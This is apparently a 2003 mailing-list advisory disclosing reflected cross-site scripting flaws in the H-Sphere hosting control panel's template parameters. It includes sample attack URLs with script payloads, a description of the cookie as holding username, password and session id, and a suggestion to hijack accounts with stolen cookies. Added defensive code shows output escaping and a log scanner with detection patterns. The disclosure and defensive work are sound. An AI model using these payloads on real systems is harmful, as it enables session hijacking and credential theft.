PSOFT H-Sphere XSS Vulnerabilities

From: Lorenzo Manuel Hernandez Garcia-Hierro (securityat_private)
Date: Mon Jun 09 2003 - 10:47:54 PDT

    --------------------
    Product: PSOFT H-Sphere ( Hosting Control Panel )
    Vendor: PSOFT ( Positive Software Corporation )
    Versions:
             VULNERABLE
             
             - 2.3.x
             - 2.2.x
             - 2.1.x
             - 2.0.x
            
             NOT VULNERABLE
            
             - ?
    ---------------------
    
    Description:
    
    H-Sphere is a scalable multiserver web hosting control panel which
    provides complete hosting automation for Linux, BSD and Win2000 platforms,
    is easy to use, and has an extensive user interface, a billing solution,
    and an integrated trouble ticket system.
    
    -----------------------------------------
    SECURITY HOLES FOUND and PROOFS OF CONCEPT:
    -----------------------------------------
    
    I encountered many XSS (Cross Site Scripting) vulnerabilities in
    PSOFT's product H-Sphere, located in the template inclusion system.
    The flaw is in the way the template system includes an HTML template
    page: if the page does not exist, the system prints an error like this:
    
    Unknown template : '[PATH TO NON EXISTENT TEMPLATE PAGE]'
    
    The requested name is written into that message without HTML encoding,
    so you can insert HTML and script code by passing it in the URL like
    this:
    
    http://[TARGET]/[PATH TO PSOFT H-SPHERE INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED USER]/[ID]/[PATH OF H-SPHERE USER SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES YOUR CODE]
    
    The new error page prints this:
    
    Unknown template : '[HERE COMES YOUR CODE]'
    
    and the user's web browser executes all the code and scripts included in
    the new error page.
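    The following is an added example and not H-Sphere's or PSOFT's code: a
    minimal model of the error page as described above, reflecting the
    template name verbatim, beside the same page with the name HTML-escaped,
    plus a helper that pulls template_name out of a request URL. The host,
    paths, user name and id in SAMPLE_URL are placeholders.

```python
# Added example, not PSOFT/H-Sphere code: model of the "Unknown template" error
# page. The vulnerable version reflects the requested name verbatim, as the
# advisory describes; the hardened version HTML-escapes it first.
import html
from urllib.parse import parse_qs, urlsplit


def render_error_vulnerable(template_name: str) -> str:
    """Error page as described in the advisory: the name is reflected unescaped."""
    return f"<html><body>Unknown template : '{template_name}'</body></html>"


def render_error_safe(template_name: str) -> str:
    """Same page with the name HTML-escaped. quote=True also escapes ' and ",
    which closes the attribute-breaking trick used with requestURL."""
    return f"<html><body>Unknown template : '{html.escape(template_name, quote=True)}'</body></html>"


def template_name_from_url(url: str) -> str:
    """Return the URL-decoded template_name query parameter ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("template_name", [""])[0]


def payload_survives(page: str, payload: str) -> bool:
    """True when the raw payload made it into the page unchanged, i.e. the sink is live."""
    return payload in page


# Constructed request modelled on the advisory's sample URL; host, path,
# user name and id are placeholders.
SAMPLE_URL = (
    "http://target.example/hsphere/servlet/psoft.hsphere.CP/alice/1234/"
    "psoft.hsphere.CP?template_name=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
)

if __name__ == "__main__":
    name = template_name_from_url(SAMPLE_URL)
    for label, page in (("vulnerable", render_error_vulnerable(name)),
                        ("escaped", render_error_safe(name))):
        print(f"{label}: script tag reflected = {payload_survives(page, '<script>')}")
        print("  " + page)
```

    Escaping at the output point is what removes the whole class of bug the
    advisory lists, since every parameter reflected into the page
    (template_name, ftemplate, requestURL) goes through the same kind of sink.
    Rejecting only '<' on input would miss the requestURL sample below, which
    breaks out of an attribute with a double quote rather than opening a tag.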
    This can be used to steal user cookies, which look like this:
    
    MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00
    
    STRUCTURE OF THE H-SPHERE COOKIE:
    
    MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]
    
    Note that the cookie carries the user's password as well as the session
    id, so a stolen cookie exposes the password itself and not only the
    session. You can set your own H-Sphere cookie to the stolen value and
    use the system with that user's credentials (think of modifying the
    user's hosting plans... ;-) ).
    
    Note that the victim must be validly logged in the whole time, or the
    attacker must use a specially crafted URL to inject commands on the
    client side through the template system. I am thinking of some public
    URLs...
    
    
    --------------
        SAMPLES
    --------------
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&password=[PASSWORD]
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<H1>xss</H1>
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<IFRAME>
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<h1>XSS
    
    http://[TARGET]/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<script>alert(document.cookie);</script>
    
    
    All URLs that take template input through the template / ftemplate /
    template_name parameters are affected by this type of XSS attack.
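    As a defender-side addition (not from the advisory and not PSOFT code),
    the following scans web-server access-log lines for requests to the
    psoft.hsphere.CP servlet whose template, ftemplate, template_name or
    requestURL parameter decodes to something containing markup. The log
    lines are constructed for the example; the hosts, users, paths and
    credentials in them are placeholders, and the common-log layout is an
    assumption.

```python
# Added example, not H-Sphere/PSOFT code: scan access-log lines for requests to
# the psoft.hsphere.CP servlet whose reflected parameters carry HTML or script.
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names as reflected into the page, and the servlet path.
SINK_PARAMS = ("template", "ftemplate", "template_name", "requestURL")
SINK_PATH = "psoft.hsphere.CP"

# Anything that can open a tag, break out of an attribute, or start a script URL.
MARKUP = re.compile(r'[<>"]|javascript:', re.IGNORECASE)

# Common log format; an assumed layout matching the constructed sample below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)


def flag_request(line: str):
    """Return {'ip', 'time', 'hits'} for a suspicious request, else None.

    hits is a sorted list of (parameter, decoded value) pairs containing markup.
    """
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: not this scanner's job
    parts = urlsplit(m.group("target"))
    if SINK_PATH not in parts.path:
        return None  # not the control-panel servlet
    # parse_qs URL-decodes values, so %3Cscript%3E is seen as <script>
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = [
        (name, value)
        for name in SINK_PARAMS
        for value in params.get(name, [])
        if MARKUP.search(value)
    ]
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "hits": sorted(hits)}


def scan(lines):
    """Run flag_request over an iterable of log lines, keeping only the hits."""
    return [hit for hit in map(flag_request, lines) if hit]


# Constructed sample log (placeholders, not real traffic). Lines 2 and 3 carry
# the advisory's template_name and requestURL payloads, URL-encoded the way a
# browser sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jun/2003:10:47:54 -0700] "GET /hsphere/servlet/psoft.hsphere.CP/alice/1234/psoft.hsphere.CP?template_name=index.html HTTP/1.1" 200 512
10.0.0.9 - - [09/Jun/2003:10:48:10 -0700] "GET /hsphere/servlet/psoft.hsphere.CP/alice/1234/psoft.hsphere.CP?template_name=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640
10.0.0.9 - - [09/Jun/2003:10:48:31 -0700] "GET /hsphere/servlet/psoft.hsphere.CP?action=login&ftemplate=x&requestURL=%22%3E%3Ch1%3EXSS%3Ca%20href=%22&login=bob&password=pw HTTP/1.1" 302 0
10.0.0.7 - - [09/Jun/2003:10:49:02 -0700] "GET /images/logo.gif HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["ip"])
        for name, value in hit["hits"]:
            print(f"  {name} = {value!r}")
```

    The third sample line also shows a separate problem visible in the
    advisory's first sample URL: login and password travel in the query string
    of a GET request, so they land in every proxy and server log next to the
    injected requestURL value.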
    
    
    -------------------------
    | CONCLUSIONS AND NOTES |
    -------------------------
    
    All the URLs that use this template inclusion input are affected by this
    hole.
    User data and cookies can be stolen through it without permission.
    In some conditions server-side commands can be passed as well.
    The server can be attacked by sending specially crafted URLs and input
    values.
    Another user's domain configuration can be entered by passing a specific
    domain id value.
    
    - I tested this on the official PSOFT demo and it worked, but recently
    they changed the demo and don't allow me to enter the system.
    The system says a Generic Error.  ;-).
    
    -----------
    | CONTACT |
    -----------
    
    Lorenzo Manuel Hernandez Garcia-Hierro
     --- Computer Security Analyzer ---
     --Nova Projects Professional Coding--
     PGP: Keyfingerprint
     B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
     ID: 0x9C38E1D7
     **********************************
     www.novappc.com
     security.novappc.com
     www.lorenzohgh.com
     ______________________
     
    



    This archive was generated by hypermail 2b30 : Mon Jun 09 2003 - 13:58:31 PDT